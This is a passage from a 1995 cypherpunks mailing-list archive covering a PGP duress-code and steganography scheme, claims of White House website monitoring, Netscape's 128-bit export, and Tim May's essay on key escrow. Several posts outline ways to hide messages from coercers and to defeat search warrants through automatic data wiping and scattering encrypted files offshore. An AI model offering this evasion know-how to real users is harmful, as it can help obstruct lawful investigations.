fixed size for the express purpose of hampering traffic analysis (of the type of my, Alice did have a lot to say to Bob that day). It would be even better cover if the thing had gotten sent through a remailer, as this kind of thing is expected of type I remailer traffic (before mixmaster which does the packetizing for you). So the duress message really looks like this: +---------+---------------------------+--------------------+--------+ | pgp hdr | IDEA encrypted duress msg | stealthed real msg | noise | +---------+---------------------------+--------------------+--------+ the IDEA block has a length field, but you can increase the length without damage to include the following stealthed stuff as the underlying stuff which is IDEA encrypted will know it's length on decryption, and the following junk will just be discarded. So, Alice and her secret key ring (encrypted) gets nabbed by the Charlie (CoS?), and coerced into divuling her passphrase. And if and when it is noticed that the message was longer than it ought to be (CoS that smart? substitute the NSA and they'd notice for sure), Alice explains away the junk on the end by pointing them to the fact that all of her messages where exactly (say) 16k long, and that she was using a the noise only script, and that the message really is this: +---------+---------------------------+-----------------------------+ | pgp hdr | IDEA encrypted duress msg | noise | +---------+---------------------------+-----------------------------+ Now we come to arguments about why you might want this built-in to PGP. Well it provides plausible deniablity as you have no extra software which might look incriminating unless you managed to dispose of it first, if it comes as stock. Also the 2nd reason for built-in at least for stealth is if it needs good random number source, but as I said, I'm not sure it needs a random no generator. So comments please, this has been around a few times already, but here's the algorithm for manipulating x which is the RSA encrypted component of the header of an RSA+IDEA encrytped PGP message: (this is a description of my implementation of Hal's algorithm as described on his www page: http://www.portal.com/~hfinney/): consider random no x, RSA modulus N 1 < x < N (that used to say 0 <= x < N, but 0, and 1 being RSA fixed points, 0, 1, and N won't be generated by PGP presumably? I think this shouldn't matter as the keyspace of N is so large that the probability of a 0 or a 1 specifically is nothing to worry about I think.) Hal's algorithm was to convert x to being in the range: 0 <= x' < lim where lim which is the next power of 2 above N * 2^surety, and surety is 64, 64 seems big enough? The recover operation is: x = x' mod N and the create operation is: 1) scale = int( (lim-1) / N ) + 1 2) scale2 = 2^int( log2( scale ) + 1) ie scale2 = next power of two over scale 3) r = MD5( 0, x ) ie MD5 digest of x, as x is an RSA encrypted random session key misc other info, and more random padding to bring up to be close to N in size. It strikes me that we already have a random number, and that provided MD5 can not be inverted (which it is not possible, as it is compressing, and looses info, and the brute force to find which of all the possible y's (0 < y < N) MD5 digests come out to be x. I would have thought it likely that this would be evenly distributed, and that the cost would be enormous? 4) r = MD5( r, rand() ) it will fail some of the time, so in this case repeat with another random number, Istirred it in first but perhaps you would only do it if it failed. Or perhaps it is enough to MD5( r, r ) ie stir r into itself to generate another ran no? So long as there are no rare cycles? Presumably either impossible or infinitessimally small probability. 5) r = r mod scale2 6) if (r > scale) goto 4) 4),5) & 6) are designed to generate an evenly distributed random number in the range: 0 <= r <= scale 7) x' = N * r + x 8) if (x' > lim) goto 4) an example, with small numbers, and surety set to 8, x = 7, and manufactoring the ran nos manually: lim = 2^( int( log2(N) + 1 ) + surety ) = 2^( 4 + 8 ) = 4096 1) scale = int( 4096 / 13 ) + 1 = 316 2) scale2 = 2^( int( log2( scale ) ) +1 ) = 2^(8 + 1) = 512 3) say MD5( x ) = 0x00000000000000000000000000001234 4) say MD5( x, rand ) = 0x00000000000000000000000000001235 = 4661 (base 10) 5) r = 4661 mod scale2 = 4661 % 512 = 53 6) if ( 53 > 315 ) - it's not 7) x' = N * r + x = 13 * 53 + 7 = 696 8) if (696 > 4096) - it's not) so x' = 696 reversing: x = x' mod N = 696 mod 13 = 7 when 6) is true, ie r > scale which will happen half the time on avg with the first ran no, and so on like a coin flip, the chances of many coins flipping the wrong way diminishes rapidly with number of flips. when 8) is true, ie x' > lim, x' can only be > than lim when x = N - 1, and given that x = N - 1, the probability is less of x being in N * scale <= x < lim but this will only occur with probability: 1 1 -------- < ----- 2^surety scale I think. So you'd have to collect one mess of messages to even catch one sample, let alone enough messages to have a statistical proof of steganography being present. Pls check the maths a bit, the above describes the software implementation of Hal's algorithm which he has on-line, on his page: http://www.portal.com/~hfinney/ But the main question I'd like to get verification on is if it is safe to use the MD5 of the RSA encrypted message to perform the operation. I'm essentially doing: x' = N * f(MD5(x)) + x where f(y) is a function which converts from range 0 <= y < 2^128 to a range 0 <= f(y) < scale. Is that safe? x is random, and will be different even for a repeat encryption of the same file, as PGP is using a random IDEA session key. So are there any brute force attacks on that which would be cheaper than attacking 128 bit IDEA? PGP's random number generator also makes extensive use of MD5, so I'm taking the use of MD5 as secure as a given. If it is thought to be dangerous for some reason (it is after all some kind of signature on it's self, presume that you know N, and x' but not x, the question is can the equation be brute force reversed in a less than 128 bit brute force attack. I'm neglecting to consider the rand() calls, which I'm not expecting to add security, but are just a mechanism to stir the value with to get more random nos, as occasionally the alogrithm needs more than one, if the first fails, etc. If people reckon it's insecure, then it would be ideal to include the stealth functionality into PGP, so that integral use of PGPs ran no routines can be made. I was previously using an MD5 digest of PGPs randseed.bin for this, but you can't stir it (well you could but that would considered a security risk diddling with PGPs files), and not stirring means you have no improvement over the above, in the event that that your system is captured with the known plaintext. If you stirred it there would be no proof of that being the message in the file. Even unstirred, if the N * f(MD5(x)) + x is no good, the inclusion of a digest of the randseed.bin would be a big improvement. It seems rather messy to have all of the keyboard sampling stuff, for PGP keys duplicated for this. Hope the x' = N * f(MD5(x)) + x construct is secure as this will avoid the issue. Adam From trei at process.com Tue Sep 12 10:45:36 1995 From: trei at process.com (Peter Trei) Date: Tue, 12 Sep 95 10:45:36 PDT Subject: Digital Fingerprinting Message-ID: <9509121745.AA19687@toad.com> > Finding the mail mixed in there is evidence that supports the "charge" > but surely can be rebutted. When I was practicing in a small town c. > 1984, people would be summoned (sent a paper telling them to show up) to > court for illegal dumping if their mail was found with other trash, old > refrigerators, etc., in a creek somewhere. Those charged could always > put on proof that Billy Bob's garbage service picked up their trash ... > The sentence was almost always to go and pick up some multiple of the > garbage found and take it to the landfill. This was Stockbridge, in MA, right :-? That's what we did, and drove back to the church, had a thanksgiving dinner that couldn't be beat, went to sleep and didn't get up until the next morning, when we got a phone call from officer Obie. Said "Kid, we found your name on an envelope at the bottom of a half a ton of garbage, and just wanted to know if you had any information bout it". I said "Yes Sir Officer Obie, I cannot tell a lie, I put that envelope under that garbage." (c) Arlo Guthrie Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From an215712 at anon.penet.fi Tue Sep 12 10:50:29 1995 From: an215712 at anon.penet.fi (an215712 at anon.penet.fi) Date: Tue, 12 Sep 95 10:50:29 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: <9509121717.AA03226@anon.penet.fi> - ---------------------------------------------------------- WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET The National Security Agency presumably can monitor subversive communication on the Internet without leaving any trace by "sniffing packets" at traffic nodes. For purely political purposes, however, the White House may be forced to do the monitoring in-house, which means that they leave traces everywhere they go. With just a superficial search for such traces, The Washington Weekly has uncovered intensive monitoring of "dissident" Internet sites by the White House. It turns out that computers from inside the White House have kept pretty good tabs on information available on Whitewater, Vince Foster, and Mena at a few key repositories on the World- Wide Web, a subset of the Internet. Just three such sites: "The Washington Weekly, "The Whitewater Scandal Home Page" and "Whitewater & Vince Foster," were accessed 128 times by four computers from the Executive Office of the President between August 28 and August 31. If the White House is showing a similar interest in other sites on the World Wide Web, that would amount to a monitoring operation of considerable magnitude. Tim Brady of the Yahoo! World-Wide Web index says that his company alone has indexed approximately 725 political sites. That monitoring effort would be nothing, however, compared to the effort required to follow all anti- Clinton discussion on the Usenet, another subset of the Internet. The White House did not respond to an inquiry (attached below) asking for an explanation and asking whether this constituted "casual browsing." Interestingly, the week after the White House snooping of files, which included a series of articles by J. Orlin Grabbe on Vince Foster's ties to the NSA, the following little piece appeared in Newsweek Magazine: "Conspiracy theorists perked up when Deborah Gorham told Senate Whitewater investigators in June that her boss, the late deputy White House counsel Vince Foster, asked her to put two secret notebooks from the National Security Agency in a White House safe. The suggestion that Foster dealt with the NSA sparked feverish speculation on the Internet that he was involved in espionage. The reality appears more prosaic. The White House won't give details, but sources say Foster's files dealt with legal questions about national emergencies...." Does the White House follow anti-Clinton discussion on Usenet newsgroups just as closely? The White House posts press releases to Usenet in collaboration with the Artificial Intelligence Lab at Massachusetts Institute of Technology. But MIT System Administrator Bruce Walton says that the White House does not use the same server for reading netnews. It would be difficult - although not impossible - to find the server that the White House uses for reading or receiving netnews and check for traces on that server. Readers may be tempted to post a threat to the President on a newsgroup just to see if they get a visit from the Secret Service the next day. That experiment is not advisable. It is a criminal offense. But Usenet just might be a faster conduit for getting the attention of the administration than the email address that the White House has published for the president. Attachment: THE WASHINGTON WEEKLY _________________________________________________________________ August 31, 1995 Virginia M. Terzano White House Office of the Press Secretary The White House Dear Ms. Terzano: It has come to my attention that several dissident sites on the World Wide Web have been visited by White House computers this week. Apparently, all information regarding Whitewater, Foster, and Mena has been transferred to White House computers. Specifically, the sites, "Washington Weekly" (http://www.federal.com), "The Whitewater Scandal Home Page" (http://www.cs.dartmouth.edu/~crow/whitewater/) "Whitewater & Vince Foster" (http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html) have been visited by White House computers ist1.eop.gov, ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August 28 and August 31, and a total of 128 files have been transferred to those White House computers. For all sites, this constitutes a significant increase over previous access by White House computers. In light of this information, I have the following questions: (1) Does this constitute "casual browsing" by White House staff, or is it, in light of the considerable time and effort spent during regular business hours, part of a monitoring or intelligence operation? (2) For what purpose is the information transferred to the White House used? (3) Does the White House keep information from these web sites on file, and does the White House keep a file on the persons responsible for these web sites? (4) Is the April 9 statement by David Lytel of the White House Office of Science and Technology to Amy Bauer of Copley News Service that the administration does not monitor anti-Clinton activity on the web still operative? Thank you very much for your cooperation in this matter. Sincerely, Marvin Lee The Washington Weekly Copyright (c) 1995 The Washington Weekly (http://www.federal.com) ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From rah at shipwright.com Tue Sep 12 10:54:49 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 12 Sep 95 10:54:49 PDT Subject: Payment Systems Message-ID: --- begin forwarded text From: "John Hemming CEO MarketNet" Date: Tue, 12 Sep 1995 15:38:00 PM PDT To: www-buyinfo at allegra.att.com Mime-Version: 1.0 Subject: Payment Systems For the edification of those concerned we have issued our first Electronic Cheque today. The browser now has been tested linking signed instructions directly to the web. The browser, however, is still being developed to resolve the problems with shortage of space in Windoze DGROUP. There is a copy of the browser at ftp://193.119.26.70/mktnet/pub/echeque.zip (or something similar) we would recommend waiting a while before you take it however and to take the horse.zip as well because of the DGROUP issue). The only form that will accept Echeques at the moment is http://193.118.187.107/load ordflow The trick in this form (if you are using our browser) is that it allows payment either by ECheque or by credit card and only generates the signed instruction for echeques. The signed instruction is then sent to our servers encrypted with 128 bit RC4. ttfn John --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From aba at dcs.exeter.ac.uk Tue Sep 12 11:00:12 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 12 Sep 95 11:00:12 PDT Subject: PGP duress code, and stego (was Re: PGP in UK - snooped unSTEALHed?) Message-ID: <26623.9509121759@exe.dcs.exeter.ac.uk> erm darn, I posted a huge post which should have the above subject, but instead came out with the subject line: Re: Returned mail: User unknown due to typo, could someone replying please correct that, if following up, I won't bother posting it again in respect of those who actually pay for their mail feed per k. It had a lot of questions which I'd really like people to look at, skip back a few, and take a read, it's for the implementation of stealth2, Henry Hasturs stealth util. Adam From an215712 at anon.penet.fi Tue Sep 12 11:06:11 1995 From: an215712 at anon.penet.fi (an215712 at anon.penet.fi) Date: Tue, 12 Sep 95 11:06:11 PDT Subject: Whitehouse responds to Zimmermann pardon letter Message-ID: <9509121750.AA19433@anon.penet.fi> ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From kelli at zeus.towson.edu Tue Sep 12 11:19:50 1995 From: kelli at zeus.towson.edu (K. M. Ellis) Date: Tue, 12 Sep 95 11:19:50 PDT Subject: NIST conference summary in CDT Message-ID: The Center for Democracy in Technology policy posting no. 24 provides a pretty good summary of the NIST conference. If anyone is interested, e-mail me privately and I can forward it to you. -=Kathleen M. Ellis=- kelli at zeus.towson.edu Geek Code v3.0 http://zeus.towson.edu/~kelli/ GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-) PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z** Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu From sameer at c2.org Tue Sep 12 12:44:31 1995 From: sameer at c2.org (sameer) Date: Tue, 12 Sep 95 12:44:31 PDT Subject: Elliptic Curve Public Key Crypto In-Reply-To: <199509121620.JAA08381@well.com> Message-ID: <199509121939.MAA25838@infinity.c2.org> ftp.csua.berkeley.edu > > > > Mike Rosing writes: > > >in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii > >files. One contains code and the other contains documentation: > >eliptic.src and elliptic.doc. The code portion is a cat'ed block > >of files: headers, C sources and a set of prime numbers. The > >documentation attempts to explain the math, but it does help if > >you already know number theory. It hopefully isn't necessary. > > Thanks Mike for all your effort!! > > Now could someone remind me where the Cypherpunks FTP site is? > > Please? > > Brian D Williams > Cypherpatriot > > " Zen? Well it beats sitting around on your ass all day doing > nothing! " > -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From cwe at Csli.Stanford.EDU Tue Sep 12 12:49:59 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Tue, 12 Sep 95 12:49:59 PDT Subject: Netscape to patch shareware version In-Reply-To: Message-ID: <199509121948.MAA03663@Csli.Stanford.EDU> | Meanwhile, in an as yet unannouced move, the company said it would place | its commercial browser online for free downloading. [..] THe commercial | version, sold only in the U.S. contains an unbreakable 128-bit | encryption scheme. Hurray! We did it! We did it! :-) | Netscape said it received word last week that the State Department had | cleared that version for release on the Net, but only within the U.S., | owing to current export laws banning the export of encryption schemes | stronger than 40 bits. THe company could provide no details by press | time on how it would ensure that the 128-bit version wouldn't leak beyond | U.S. borders. Ok, any bet on how long it will take? | The cypherpunks forced a situation where Net users now have better | encryption available to them. I'd say this is a big win. The power of the Net is actually quite astonishing at times. The plotting in Ender's Game isn't all that unrealistic after all. (Oh, well, ruler of the world is a bit of still. ;-)) /Christian From pfarrell at netcom.com Tue Sep 12 13:01:10 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Tue, 12 Sep 95 13:01:10 PDT Subject: DC-C'punks meeting Message-ID: <199509121958.MAA01005@netcom3.netcom.com> Sorry to waste list bandwidth for the 600 folks too far away to care about this... The next DC-area c'punks meeting will be September 16, it will be at the Digex headquarters offices in Beltsville, probably starting about 3:00 PM. Digital Express Group 6800 Virginia Manor Road Beltsville Maryland 20705 (301) 847-5000 Directions to DIGEX >From the Washington Beltway (I495) in Maryland, take Route 1 North. drive on Route 1 a few miles, maybe as many as three or four. You will see a Ritz Camera Center. Turn left onto Ritz Way. At the second street, turn Right onto Virginia Manor Road. You are now near 6800 Virginia Manor Road. Digex is the last building on the Right. If you need more information, email me, or see my http://www.isse.gmu.edu/~pfarrell/dccp page. Pat Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrell Infor. Systems and Software Engineering, George Mason University, Fairfax, VA PGP key available via finger or request #include standard.disclaimer From carolann at censored.org Tue Sep 12 13:08:34 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Tue, 12 Sep 95 13:08:34 PDT Subject: Netscape to patch shareware version Message-ID: <199509122007.NAA17074@usr3.primenet.com> As fast as it takes to FTP it over there. I have copies of every server Netscape's got, although I haven't unpacked them or used them. Will this take up another 75 megs on the HD? Lover Always, Carol Anne.....dreaming of her own web server someday. >| Meanwhile, in an as yet unannouced move, the company said it would place >| its commercial browser online for free downloading. [..] THe commercial >| version, sold only in the U.S. contains an unbreakable 128-bit >| encryption scheme. >Ok, any bet on how long it will take? > >/Christian -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From keelings at wu1.wl.aecl.ca Tue Sep 12 13:17:31 1995 From: keelings at wu1.wl.aecl.ca (S. Keeling) Date: Tue, 12 Sep 95 13:17:31 PDT Subject: Scientology tries to break PGP - and Message-ID: <9509121731.AA10786@wu1.wl.aecl.ca> Incoming from Henry W. Farkas: > [snip] > When the safety is finally removed from the gun at your head (sorry for > the drama) you hand over your alternate secret key. If decrypted with the > "alternate" or "fake" secret key, the encrypted file is wiped until it > reaches a marker; the remainder of the file is displayed. If you use your > "primary" or "real key", the extraneous text is simply stripped. I would just like to point out that, when a LEA comes to you to get at the contents of your computer, (s)he is not going to patiently wait while your system wipes the offending evidence off your hard disk. The first thing they do is make a copy of everything, so they can work from the copy. Besides, you do have backup tapes laying around all over the place, don't you? -- "Remember, obsolescence (Win95) isn't an accident; it's an art form!" keelings at wu1.wl.aecl.ca s. keeling, aecl - whiteshell labs From gjeffers at socketis.net Tue Sep 12 13:25:26 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Tue, 12 Sep 95 13:25:26 PDT Subject: Secure Device 1.4 (secdr14.zip) Message-ID: <199509122327.SAA25529@mail.socketis.net> Dear fellow Cypherpunks, Could someone send me Secure Device 1.4 (Secdr14.zip) ? My ftp software won't accept the huge directory path needed to point at the package on U.S. servers. I am an American citizen at an American site who knows the export regulations. Thank You, Gary Jeffers From mclow at coyote.csusm.edu Tue Sep 12 13:50:40 1995 From: mclow at coyote.csusm.edu (Marshall Clow) Date: Tue, 12 Sep 95 13:50:40 PDT Subject: Netscape to patch shareware version Message-ID: >| Meanwhile, in an as yet unannouced move, the company said it would place >| its commercial browser online for free downloading. [..] THe commercial >| version, sold only in the U.S. contains an unbreakable 128-bit >| encryption scheme. > >Hurray! We did it! We did it! :-) Indeed. Congratulations to Damien, Adam, and all the other people who contributed cycles to the "Cypherpunks Key Breaking Ring". > >| Netscape said it received word last week that the State Department had >| cleared that version for release on the Net, but only within the U.S., >| owing to current export laws banning the export of encryption schemes >| stronger than 40 bits. THe company could provide no details by press >| time on how it would ensure that the 128-bit version wouldn't leak beyond >| U.S. borders. > I suspect Netscape will do the minimum so that they will not be held liable. >Ok, any bet on how long it will take? > Less than 3 hours. >| The cypherpunks forced a situation where Net users now have better >| encryption available to them. I'd say this is a big win. > >The power of the Net is actually quite astonishing at times. The >plotting in Ender's Game isn't all that unrealistic after all. (Oh, >well, ruler of the world is a bit of still. ;-)) > Demosthenes From jya at pipeline.com Tue Sep 12 13:51:22 1995 From: jya at pipeline.com (John Young) Date: Tue, 12 Sep 95 13:51:22 PDT Subject: GAK/weak crypto rationale? Message-ID: <199509122051.QAA14953@pipe4.nyc.pipeline.com> Responding to msg by Andrew.Spring at ping.be (Andrew Spring) on Tue, 12 Sep 7:3 PM >A more cautious conclusion would be would be that the >importance (to the LEA's) of the busts made with >crypto is much larger than the numbers suggest. You >could interpret that a lot of ways: I suspect that >high-profile career-enhancing cases are highly >dependent on wiretaps. In response to an audience question about wiretaps and crypto, Mr. Michael Nelson of the White House said at the NIST GAK meeting (paraphrased): We are not concerned with bad people using crypto among themselves, we can handle that. We are more concerned with their using crypto to communicate with regular folks, to make legitimate arrangements -- finance, supplies, travel, and so on -- for their nefarious deeds. It's the intermix of the bad with the good that's the problem. Maybe someone else at the meeting heard this differently and will comment, but this seems to mean that the Feds can track, and maybe crack, the crypto-intercomm of "bad people" so long as it is not buried in a torrent of public crypto use. And not commingled with lawful, ECPA- protected(?), communication. Anybody want to elaborate what Mr. Nelson was implying about wiretaps and crypto? From anon-remailer at utopia.hacktic.nl Tue Sep 12 14:00:35 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Tue, 12 Sep 95 14:00:35 PDT Subject: Netscape to patch shareware version Message-ID: <199509122100.XAA13066@utopia.hacktic.nl> >| Netscape said it received word last week that the State Department had >| cleared that version for release on the Net, but only within the U.S., >| owing to current export laws banning the export of encryption schemes >| stronger than 40 bits. THe company could provide no details by press >| time on how it would ensure that the 128-bit version wouldn't leak beyond >| U.S. borders. > >Ok, any bet on how long it will take? It's already been exported. Evidently, one of those who bought the commercial version sent it to Europe as soon as it was out. I note the site removed it, however, probably because Netscape Comm. Inc. requested that they do so. Netscape generally objects to anyone else carrying their browser (.edu sites with prior permission excepted). From adam at rosa.com Tue Sep 12 14:00:54 1995 From: adam at rosa.com (Adam Philipp) Date: Tue, 12 Sep 95 14:00:54 PDT Subject: VOO_doo Message-ID: --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\ |PGP key available on my home page|Unauthorized interception violates | | http://www.rosa.com/~adam |federal law (18 USC Section 2700 et| |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted | |SUB ROSA: Confidential, |communications are preferred for | |secret, not for publication. |sensitive materials. | \-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/ From tcmay at got.net Tue Sep 12 14:07:02 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 12 Sep 95 14:07:02 PDT Subject: Key Escrow as Law Enforcement's *Worst Nightmare* Message-ID: "Be careful what you ask for--you might get it." (Albanian Proverb) I'll summarize my post with my last line: In short, key escrow could be law enforcement's worst nightmare, as it truly opens up the Web as a worldwide, distributed file system. At 6:31 PM 9/12/95, S. Keeling wrote: > I would just like to point out that, when a LEA comes to you >to get at the contents of your computer, (s)he is not going to >patiently wait while your system wipes the offending evidence off your >hard disk. The first thing they do is make a copy of everything, so >they can work from the copy. Besides, you do have backup tapes laying >around all over the place, don't you? This is a main reason why "key escrow" is a double-edged sword for Law Enforcement. That is, it is not an unadulterated "win" for them. Consider the easy availability of a "key escrow" system (I'm deliberately avoiding calling it either SKE, or CKE, or GAK) in which files may be locally encrypted with the files, local decryption software, etc., stored locally--but with efficient fast-erase methods (ranging from the oft-mentioned "thermite charge" to a more user-friendly overvoltage to fry the motherboard (for example, just to make the point). (My point is not to speculate on what a "dead man switch" might look like, but merely to look at the implications of widespread key escrow and data destruction tools.) Key escrow, with the keys deposited safely with one's "Family" (in both senses of the term), and/or with one's lawyer, and/or in offshore locations) could make the use of dead man switches much "safer." A numbers game operator can rest easy in flushing his computer, knowing key escrow and remote storage exists. "Remote storage"? Sure, the Web offers easy and transparent ways to split files up and store them in various locales. Kind of makes "search warrants" a problem, doesn't it? The promise of the Web, to many of us, is that URLs essentially make the machines accessible via the Web into a kind of huge, distributed file system. Remote sites can already be used for storage, obviously. The Web offers a new degree of automation of the process, with many interesting possibilities. An interesting project would be build tools similar to ftp for automatic backup of files to remote locations, perhaps locations that accept "deposits" for a fee. (In digital money tokens, even.) The tool could do multi-part splitting, and could encrypt the files. Keys (and the locations of the parts) could independently exploit the kind of "key escrow" mentioned above. So, a raid is made on a site. The files are not found there, as they have been automatically filed on other sites, with the key/location info escrowed with escrow agents who are not cooperative with search warrants, subpoenas, etc. (It may be sufficient for a person to "remember" the N sites, as the sites may be uncooperative enough so as to make it impossible for the law enforcement people to "demand" access to files. I can discuss this furhter. While not "secure" in a strong crypto sense, in practice this will be pretty effective--after all, the pieces are similar to offshore bank account access info, and law enforcement is pretty much powerless to get N countries/banks to cooperate on a blanket search.) In short, key escrow could be law enforcement's worst nightmare, as it truly opens up the Web as a worldwide, distributed file system. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From lindat at iquest.net Tue Sep 12 14:07:34 1995 From: lindat at iquest.net (Linda Thompson, American Justice Federation) Date: Tue, 12 Sep 95 14:07:34 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: >To: cypherpunks at toad.com >From: an215712 at anon.penet.fi >X-Anonymously-To: cypherpunks at toad.com >Organization: Anonymous forwarding service >Reply-To: an215712 at anon.penet.fi >Date: Tue, 12 Sep 1995 17:17:15 UTC >Subject: Whitehouse "dissident" web site monitoring? > >- ---------------------------------------------------------- > > WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET > > > The National Security Agency presumably can monitor >subversive communication on the Internet without leaving any >trace by "sniffing packets" at traffic nodes. For purely >political purposes, however, the White House may be forced to do >the monitoring in-house, which means that they leave traces >everywhere they go. > > With just a superficial search for such traces, The >Washington Weekly has uncovered intensive monitoring of >"dissident" Internet sites by the White House. > > It turns out that computers from inside the White House have >kept pretty good tabs on information available on Whitewater, >Vince Foster, and Mena at a few key repositories on the World- >Wide Web, a subset of the Internet. > > Just three such sites: "The Washington Weekly, "The >Whitewater Scandal Home Page" and "Whitewater & Vince Foster," >were accessed 128 times by four computers from the Executive >Office of the President between August 28 and August 31. If the >White House is showing a similar interest in other sites on the >World Wide Web, that would amount to a monitoring operation of >considerable magnitude. Tim Brady of the Yahoo! World-Wide Web >index says that his company alone has indexed approximately 725 >political sites. That monitoring effort would be nothing, >however, compared to the effort required to follow all anti- >Clinton discussion on the Usenet, another subset of the Internet. > > The White House did not respond to an inquiry (attached >below) asking for an explanation and asking whether this >constituted "casual browsing." > > Interestingly, the week after the White House snooping of >files, which included a series of articles by J. Orlin Grabbe on >Vince Foster's ties to the NSA, the following little piece >appeared in Newsweek Magazine: > > "Conspiracy theorists perked up when Deborah Gorham told Senate > Whitewater investigators in June that her boss, the late deputy > White House counsel Vince Foster, asked her to put two secret > notebooks from the National Security Agency in a White House > safe. The suggestion that Foster dealt with the NSA sparked > feverish speculation on the Internet that he was involved in > espionage. The reality appears more prosaic. The White House > won't give details, but sources say Foster's files dealt with > legal questions about national emergencies...." ==================================================== During the Waco Hearings, Charles Schumer said he'd seen Foster's missing file and all it had in it was a memorandum about "Linda Thompson and THAT tape." Now, put that with the "sources say Foster's files dealt with legal questions bout national emergencies . . . ." and I will presume that "THAT tape" and I constitute a "national emergency." Harumph. At any rate, we've (AEN News) had a number of military-based sniffs here. -- Linda ================================================ > Does the White House follow anti-Clinton discussion on Usenet >newsgroups just as closely? The White House posts press releases >to Usenet in collaboration with the Artificial Intelligence Lab >at Massachusetts Institute of Technology. But MIT System >Administrator Bruce Walton says that the White House does not use >the same server for reading netnews. It would be difficult - >although not impossible - to find the server that the White House >uses for reading or receiving netnews and check for traces on >that server. > > Readers may be tempted to post a threat to the President on a >newsgroup just to see if they get a visit from the Secret Service >the next day. That experiment is not advisable. It is a criminal >offense. But Usenet just might be a faster conduit for getting >the attention of the administration than the email address that >the White House has published for the president. > >Attachment: > > > THE WASHINGTON WEEKLY >_________________________________________________________________ > >August 31, 1995 > >Virginia M. Terzano >White House Office of the Press Secretary >The White House > > >Dear Ms. Terzano: > > It has come to my attention that several dissident sites on >the World Wide Web have been visited by White House computers >this week. Apparently, all information regarding Whitewater, >Foster, and Mena has been transferred to White House computers. > > Specifically, the sites, > >"Washington Weekly" (http://www.federal.com), >"The Whitewater Scandal Home Page" >(http://www.cs.dartmouth.edu/~crow/whitewater/) >"Whitewater & Vince Foster" >(http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html) > >have been visited by White House computers ist1.eop.gov, >ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August >28 and August 31, and a total of 128 files have been transferred >to those White House computers. For all sites, this constitutes a >significant increase over previous access by White House >computers. > > In light of this information, I have the following questions: > >(1) Does this constitute "casual browsing" by White House staff, or > is it, in light of the considerable time and effort spent during > regular business hours, part of a monitoring or intelligence operation? > >(2) For what purpose is the information transferred to the White House used? > >(3) Does the White House keep information from these web sites on file, > and does the White House keep a file on the persons responsible for > these web sites? > >(4) Is the April 9 statement by David Lytel of the White House Office of > Science and Technology to Amy Bauer of Copley News Service that the > administration does not monitor anti-Clinton activity on the web still > operative? > > > Thank you very much for your cooperation in this matter. > >Sincerely, > >Marvin Lee >The Washington Weekly > >Copyright (c) 1995 The Washington Weekly (http://www.federal.com) > > > Linda Thompson American Justice Federation Home of AEN News and "Waco, the Big Lie" "America Under Siege" 3850 S. Emerson Ave. Indianapolis, IN 46203 Telephone: (317) 780-5200 Fax: (317) 780-5209 Internet: lindat at iquest.net "When even one American -- who has done nothing wrong -- is forced by fear to shut his mind and close his mouth, then all Americans are in peril." Harry Truman From kelso at netcom.com Tue Sep 12 14:17:31 1995 From: kelso at netcom.com (Tom Rollins) Date: Tue, 12 Sep 95 14:17:31 PDT Subject: Scientology tries to break PGP - and (fwd) Message-ID: <199509122056.NAA19963@netcom19.netcom.com> > I would just like to point out that, when a LEA comes to you > to get at the contents of your computer, (s)he is not going to > patiently wait while your system wipes the offending evidence off your > hard disk. The first thing they do is make a copy of everything, so > they can work from the copy. Besides, you do have backup tapes laying > 